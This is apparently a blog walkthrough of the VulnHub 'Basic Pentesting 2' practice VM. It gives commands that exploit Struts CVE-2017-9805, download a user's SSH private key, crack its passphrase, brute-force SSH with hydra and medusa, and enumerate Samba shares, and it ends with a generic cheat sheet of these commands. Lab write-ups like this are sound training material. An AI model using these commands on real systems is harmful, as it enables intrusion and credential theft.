Categories
Security

VulnHub – Basic Pentesting 2

Walkthrough of the exploitation of Basic Pentesting 2 from VulnHub.

Setup

Our attacking box is a virtual machine that has the IP 192.168.56.102 and runs an updated Kali Linux 2020.3. Throughout the penetration test, we will try to avoid using any automated exploitation tools. The target is Basic Pentesting 2, a vulnerable virtual machine to practice penetration testing. It has the IP 192.168.56.101 and we have no further information about this target.

Information Gathering

We start by running nmap on the target IP.

nmap -sV -Pn -n 192.168.56.101
Image 1: nmap scan of the target.

We have the following open ports to investigate:

  • SSH server (OpenSSH 7.2p2 on port 22)
  • webserver (Apache 2.4.18 on port 80)
  • Samba (smbd 3.X-4.X on ports 139 and 445)
  • Apache Jserv (1.3 on port 8009)
  • Apache Tomcat (9.0.7 on port 8080)

Let’s check out the webserver first by opening 192.168.56.101:80 in the browser.

Image 2: Connecting to the webserver.

Next, we run nikto to get some more information.

nikto -h 192.168.56.101
Image 3: nikto scan of the target.

Once again, we discover an interesting director called /development/ and we open it in a browser.

Image 4: The /development/ directory.

The directory contains two .txt files that we also open.

Image 5: The dev.txt file.
Image 6: The j.txt file.

It seems like there are at least two users with the initials “J” and “K”. Furthermore “K” seems to be an admin and “J” seems to use a weak password. That’s good to know. Apart from the Apache and SMB servers that we already know about, “K” mentions a struts 2.5.12 REST example. A quick Google search suggests that the default location for that example code is http://192.168.56.101:8080/struts2-rest-showcase-2.5.12.

Image 7: struts2 showcase page.

It seems like the struts2 test is still running. A bit of googling (“struts 2.5.12 cve”) reveals that version 2.5.12 is exploitable with code execution as indicated by CVE-2017-9805 [1].

Exploitation

We find a Python script to exploit the vulnerability by googling “CVE-2017-9805 exploit github” [2] and copy and paste the struts-pwn.py script into a file on our attack box. To test if everything works, we’ll send a ping command to our attack box through the exploit and check for incoming icmp packages with tcpdump on our attack box. 

sudo tcpdump -n icmp
python3 struts-pwn.py -u "http://192.168.56.101:8080/struts2-rest-showcase-2.5.12/" -c "ping -c2 192.168.56.102" --exploit

As we can see, the ping is sent from the target machine to our attack box.

Image 8: Receiving icmp packages through the exploit.

At this point we reach a temporary dead end because we tried to run a couple of reverse shells and none worked. It seems like you cannot run any commands with ; or &&. After a while we realized that we could try to run a server and connect to it. Running the default Python 2 webserver on port 9090 on the target machine worked.

python3 struts-pwn.py -u "http://192.168.56.101:8080/struts2-rest-showcase-2.5.12/" -c "python -m SimpleHTTPServer 9090" --exploit

After connecting to 192.168.56.101:9090 with a browser, we get a nice directory listing of the filesystem that we can explore.

Image 9: Directory listing after connecting to the Python webserver.

Post Exploitation

After entering the /home directory, we see that the usernames of “J” and “K” are jan and kay respectively. Our initial thought is to grab /etc/shadow and decrypt jan’s supposedly weak password. However, we only get a 404 when we try to access the file. However, there are a lot of interesting things in kay’s home directory.

Image 10: Home directory of kay.

Unfortunately, pass.bak, which could be a backup file for the password, cannot be accessed. However, the .ssh directory can be entered and contains a private key (id_rsa) that we can download.

curl http://192.168.56.101:9090/home/kay/.ssh/id_rsa > id_rsa

We also note that kay can login as admin, as indicated by the existence of the .sudo_as_admin_successful file.

If we try to login with the obtained key, we get a warning about the persmissions of the key file so we change that first and then connect via ssh.

chmod 600 id_rsa
ssh -i id_rsa kay@192.168.56.101
Image 11: ssh asks for a passphrase.

Unfortunately, ssh asks for a passphrase. We can use john to crack the passphrase but we first have to convert it to a suitable format with ssh2john.py. We will also use a wordlist of common passwords that were exposed after an attack on RockYou [3]. The wordlist comes preinstalled with Kali but we have to unzip it first.

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash
Image 12: Cracked ssh passphrase.

With the passphrase we ssh into the target machine and immediately try to become root. Unfortunately, we still need kay’s password. Thankfully, we remember the file pass.bak that we couldn’t access before. Sure enough, it contains the correct password and we become root. Mission accomplished 🙂

Image 13: Mission accomplished.

Alternative Attacks

ssh cracking

Since smbd is running on the target, we can use enum4linux to get some information about local users of the system.

enum4linux -r 192.168.56.101
Image 14: Username enumeration with enum4linux.

We can see that there are two local users named “kay” and “jan” on the system. We remember from before, that the user “jan” supposedly has a weak password in /etc/shadow. From this, we deduce that he will probably use weak passwords everywhere and try to crack his ssh password with medusa.

medusa -h 192.168.56.101 -f -g 5 -u 'jan' -P /usr/share/wordlists/rockyou.txt -M ssh
Image 15: Medusa scan for ssh.

Alternatively, we can use hydra, which was a bit faster than medusa.

hydra -l 'jan' -P /usr/share/wordlists/rockyou.txt 192.168.56.101 ssh
Image 16: Hydra scan for ssh.

The scans reveal the password “armando” which we use to ssh to the target machine.

Image 17: We are logged in as user jan.

Unfortunately, we are not allowed to sudo so we have to find another way to escalate our privileges on this machine. Poking around a bit, we see that we can cd into the home directory of kay. From there, we can cd into his .ssh directory and cat id_rsa and repeat the steps from our initial attack to gain root access.

smbd

To get more information about smbd, we scan the smbd ports (139,445) again but this time, we also use nmap’s script scan (-sC) feature.

sudo nmap -sV -sC -Pn -n -p 139,445 192.168.56.101
Image 18: nmap scan of the smbd ports, script scan active.

It seems like the smbd version is 4.3.11. We can also use nmap to enumerate smb shares.

nmap -sV --script=smb-enum-shares -p 445 192.168.56.101
Image 19: Using nmap to enumerate smb shares.

…and nmblookup to lookup NetBIOS names.

nmblookup -A 192.168.56.101
Image 20: nmblookup of target.

We can see that there’s an account named guest. We try to connect without a password.

smbclient -W 'WORKGROUP' //'192.168.56.101'/Anonymous -U''%''
Image 21: Successfull connection to the smb server and extraction of staff.txt.

Let’s see if the smbd is vulnerable by googling “smbd 4.3.11 cvs” which yields a whopping 21 vulnerabilities [4]. The most promising is CVE-2017-7494, also known as SambaCry [5]. Unfortunately, it seems like we are not allowed to write to the share (even though nmap previously reported we have READ/WRITE access), which is a prerequisite for the exploit [6].

Image 22: No write access to the smb share.

We can confirm this with smbmap.

Image 23: smbmap output that confirms that the share is READ ONLY.

This concludes our further tests.

Lessons Learned

Information gathering

Always check out the contents of all non-standard files that you can read. There might be some interesting information (like development and testing environments or notes about password security).

Username enumeration if samba is running:

enum4linux -r TARGET-IP

Exploitation

Listen for incoming ping

Useing tcpdump to listen for a ping is a good way of checking remote code execution. Just run ping -c2 ATTACK-IP from the target box.

sudo tcpdump -n icmp

Run a webserver on the target machine

python -m SimpleHTTPServer PORT

Cracking ssh passwords

medusa -h TARGET-IP -f -g 5 -u 'USERNAME' -P /usr/share/wordlists/rockyou.txt -M ssh
hydra -l 'USERNAME' -P /usr/share/wordlists/rockyou.txt TARGET-IP ssh

Samba

Get information about samba on the target:

sudo nmap -sV -sC -Pn -n -p 139,445 TARGET-IP
nmap --script=smb-enum-shares -p 445 TARGET-IP
nmblookup -A TARGET-IP

Check access rights and list files:

smbmap -R -H TARGET-IP

Connect to a samba share. The argument passed via -U is username%password. If left empty, an annonymous login is tried.

smbclient -W 'WORKGROUP' //'192.168.56.101'/SHARENAME -U ''%''

Post Exploitation

ssh

Always check the home directories for interesting content. SSH keys are especially useful if ssh is running on the target. Get id_rsa either by copy&pasting it or by getting it through a webserver we started.

curl http://IP:PORT/home/USERNAME/.ssh/id_rsa > id_rsa

Connect via ssh with a keyfile:

chmod 600 id_rsa
ssh -i id_rsa USERNAME@TARGET-IP

Cracking ssh pass phrases (RockYou wordlist):

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash

Misc

A .sudo_as_admin_successful file indicates, that this user can become root.

Sources

[1] https://www.cvedetails.com/cve/CVE-2017-9805/

[2] https://github.com/mazen160/struts-pwn_CVE-2017-9805

[3] https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords

[4] https://www.cvedetails.com/vulnerability-list/vendor_id-102/product_id-171/version_id-199625/Samba-Samba-4.3.11.html

[5] https://www.cvedetails.com/cve/CVE-2017-7494/

[6] https://github.com/betab0t/cve-2017-7494#usage